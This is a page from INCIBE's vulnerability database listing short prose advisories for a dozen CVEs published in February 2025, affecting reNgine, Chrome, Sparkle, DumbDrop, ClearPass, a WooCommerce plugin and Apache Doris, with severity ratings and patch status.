Vulnerabilities

With the aim of informing, warning and helping professionals with the latest security vulnerabilities in technology systems, we have made a database available for users interested in this information, which is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 registers, is based on the information from the NVD (National Vulnerability Database) – by virtue of a partnership agreement – through which INCIBE translates the included information into Spanish.

On occasions this list will show vulnerabilities that have still not been translated, as they are added while the INCIBE team is still carrying out the translation process. The CVE (Common Vulnerabilities and Exposures) Standard for Information Security Vulnerability Names is used with the aim to support the exchange of information between different tools and databases.

All vulnerabilities collected are linked to different information sources, as well as available patches or solutions provided by manufacturers and developers. It is possible to carry out advanced searches, as there is the option to select different criteria to narrow down the results, some examples being vulnerability types, manufacturers and impact levels, among others.

Through RSS feeds or Newsletters we can be informed daily about the latest vulnerabilities added to the repository. Below there is a list, updated daily, where you can discover the latest vulnerabilities.

CVE-2025-24966

Publication date:

04/02/2025

reNgine is an automated reconnaissance framework for web applications. HTML Injection occurs when an application improperly validates or sanitizes user inputs, allowing attackers to inject arbitrary HTML code. In this scenario, the vulnerability exists in the "Add Target" functionality of the application, where the Target Organization and Target Description fields accept HTML payloads. The injected HTML is rendered and executed in the target area, potentially leading to malicious actions. Exploitation of HTML Injection can compromise the application&#39;s integrity and user trust. Attackers can execute unauthorized actions, steal sensitive information, or trick users into performing harmful actions. The organization&#39;s reputation, customer trust, and regulatory compliance could be negatively affected. This issue affects all versions up to and including 2.2.0. Users are advised to monitor the project for future releases which address this issue. There are no known workarounds.

Severity CVSS v4.0: MEDIUM

Last modification:

04/02/2025

CVE-2025-24967

Publication date:

04/02/2025

reNgine is an automated reconnaissance framework for web applications. A stored cross-site scripting (XSS) vulnerability exists in the admin panel&#39;s user management functionality. An attacker can exploit this issue by injecting malicious payloads into the username field during user creation. This vulnerability allows unauthorized script execution whenever the admin views or interacts with the affected user entry, posing a significant risk to sensitive admin functionalities. This issue affects all versions up to and including 2.20. Users are advised to monitor the project for future releases which address this issue. There are no known workarounds.

Severity CVSS v4.0: HIGH

Last modification:

04/02/2025

CVE-2025-24968

Publication date:

04/02/2025

reNgine is an automated reconnaissance framework for web applications. An unrestricted project deletion vulnerability allows attackers with specific roles, such as `penetration_tester` or `auditor` to delete all projects in the system. This can lead to a complete system takeover by redirecting the attacker to the onboarding page, where they can add or modify users, including Sys Admins, and configure critical settings like API keys and user preferences. This issue affects all versions up to and including 2.20. Users are advised to monitor the project for future releases which address this issue. There are no known workarounds.

Severity CVSS v4.0: Pending analysis

Last modification:

04/02/2025

CVE-2025-0630

Publication date:

04/02/2025

Multiple Western Telematic (WTI) products contain a web interface that is vulnerable to a local file inclusion attack (LFI), where any authenticated user has privileged access to files on the device&#39;s filesystem.

Severity CVSS v4.0: MEDIUM

Last modification:

04/02/2025

CVE-2025-0509

Publication date:

04/02/2025

A security issue was found in Sparkle before version 2.6.4. An attacker can replace an existing signed update with another payload, bypassing Sparkle’s (Ed)DSA signing checks.

Severity CVSS v4.0: Pending analysis

Last modification:

17/02/2025

CVE-2025-24971

Publication date:

04/02/2025

DumpDrop is a stupid simple file upload application that provides an interface for dragging and dropping files. An OS Command Injection vulnerability was discovered in the DumbDrop application, `/upload/init` endpoint. This vulnerability could allow an attacker to execute arbitrary code remotely when the **Apprise Notification** enabled. This issue has been addressed in commit `4ff8469d` and all users are advised to patch. There are no known workarounds for this vulnerability.

Severity CVSS v4.0: CRITICAL

Last modification:

04/02/2025

CVE-2025-25039

Publication date:

04/02/2025

A vulnerability in the web-based management interface of HPE Aruba Networking ClearPass Policy Manager (CPPM) allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system.

Severity CVSS v4.0: Pending analysis

Last modification:

28/03/2025

CVE-2025-24373

Publication date:

04/02/2025

woocommerce-pdf-invoices-packing-slips is an extension which allows users to create, print & automatically email PDF invoices & packing slips for WooCommerce orders. This vulnerability allows unauthorized users to access any PDF document from a store if they: 1. Have access to a guest document link and 2. Replace the URL variable `my-account` with `bulk`. The issue occurs when: 1. The store&#39;s document access is set to "guest." and 2. The user is logged out. This vulnerability compromises the confidentiality of sensitive documents, affecting all stores using the plugin with the guest access option enabled. This issue has been addressed in version 4.0.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.

Severity CVSS v4.0: MEDIUM

Last modification:

19/02/2025

CVE-2025-0451

Publication date:

04/02/2025

Inappropriate implementation in Extensions API in Google Chrome prior to 133.0.6943.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Medium)

Severity CVSS v4.0: Pending analysis

Last modification:

08/04/2025

CVE-2025-0445

Publication date:

04/02/2025

Use after free in V8 in Google Chrome prior to 133.0.6943.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Severity CVSS v4.0: Pending analysis

Last modification:

08/04/2025

CVE-2025-0444

Publication date:

04/02/2025

Use after free in Skia in Google Chrome prior to 133.0.6943.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Severity CVSS v4.0: Pending analysis

Last modification:

08/04/2025

CVE-2024-48019

Publication date:

04/02/2025

Improper Limitation of a Pathname to a Restricted Directory (&#39;Path Traversal&#39;), Files or Directories Accessible to External Parties vulnerability in Apache Doris. Application administrators can read arbitrary files from the server filesystem through path traversal. Users are recommended to upgrade to version 2.1.8, 3.0.3 or later, which fixes the issue.

Severity CVSS v4.0: Pending analysis

Last modification:

07/02/2025

Subscribe to Vulnerabilities